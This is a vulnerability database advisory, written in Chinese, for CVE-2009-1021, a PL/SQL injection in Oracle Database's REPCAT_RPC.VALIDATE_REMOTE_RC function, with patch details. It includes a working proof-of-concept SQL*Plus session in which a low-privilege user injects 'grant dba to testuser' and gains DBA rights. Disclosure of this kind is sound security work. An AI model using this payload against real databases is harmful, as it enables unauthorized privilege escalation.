Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:12587
HistoryNov 07, 2009 - 12:00 a.m.

Oracle Advanced Replication组件REPCAT_RPC.VALIDATE_REMOTE_RC()函数权限提升漏洞

2009-11-0700:00:00
Root
www.seebug.org
13

0.007 Low

EPSS

Percentile

78.6%

JSON

BUGTRAQ ID: 35685
CVE ID: CVE-2009-1021

Oracle Database是一款商业性质大型数据库系统。

Oracle数据库Advanced Replication组件中的REPCAT_RPC.VALIDATE_REMOTE_RC()函数执行了可能受控的匿名PL/SQL。该函数取当前登录用户名为第一个参数,第二个参数VALIDATE_STRING直接放到了PLSQL的匿名块中并执行:



SQL_CURSOR := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(SQL_CURSOR, ‘BEGIN ’ || ’ :err :=
sys.dbms_repcat_validate.’ || VALIDATE_STRING || ‘(:canon_gname);’ || ’
END;', DBMS_SQL.V7);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, ‘err’, ERR);
DBMS_SQL.BIND_VARIABLE(SQL_CURSOR, ‘canon_gname’, CANON_GNAME);
DUMMY := DBMS_SQL.EXECUTE(SQL_CURSOR);

这可能允许攻击者以提升的权限执行任意代码。

Oracle Database 9.2.0.8DV
Oracle Database 9.2.0.8
Oracle Database 10.2.0.3
Oracle Database 10.1.0.5
厂商补丁:

Oracle

Oracle已经为此发布了一个安全公告(cpujul2009)以及相应补丁:
cpujul2009:Oracle Critical Patch Update Advisory - July 2009
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html


                                                SQL> CONNECT TESTUSER/QWERT124
Connected.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL> SET ROLE DBA;
SET ROLE DBA
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist
SQL> EXEC SYS.GET_OWNER('AAAA''||DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
(USER,''VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname); execute immediate
''''declare pragma autonomous_transaction;
begin execute immediate ''''''''grant dba to testuser'''''''';
end;''''; end;--'',''CCCC'')||''AAAA');
PL/SQL procedure successfully completed.
SQL> SET ROLE DBA;
Role set.
SQL> SELECT PRIVILEGE FROM SESSION_PRIVS;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
...
...
MANAGE ANY FILE GROUP
READ ANY FILE GROUP
CHANGE NOTIFICATION
CREATE EXTERNAL JOB
160 rows selected.
SQL>

Related

securityvulns 3
checkpoint_advisories 1
prion 1
cve 1
nessus 1
oracle 1
securityvulns
securityvulns
Oracle PL/SQL Injection Flaw in REPCAT_RPC.VALIDATE_REMOTE_RC
2009-08-26 00:00:00
Oracle quarterly security update
2010-02-16 00:00:00
Oracle Critical Patch Update Advisory - July 2009
2009-07-16 00:00:00
checkpoint_advisories
checkpoint_advisories
Oracle Database Server REPCAT_RPC.VALIDATE_REMOTE_RC SQL Injection (CVE-2009-1021)
2009-09-13 00:00:00
prion
prion
Information disclosure
2009-07-14 23:30:00
cve
cve
CVE-2009-1021
2009-07-14 23:30:00
nessus
nessus
Oracle Database Multiple Vulnerabilities (July 2009 CPU)
2011-11-16 00:00:00
oracle
oracle
09-07 CPU Advisory
2009-07-14 00:00:00

0.007 Low

EPSS

Percentile

78.6%

JSON
Related for SSV:12587
securityvulns3checkpoint_advisories1prion1cve1nessus1oracle1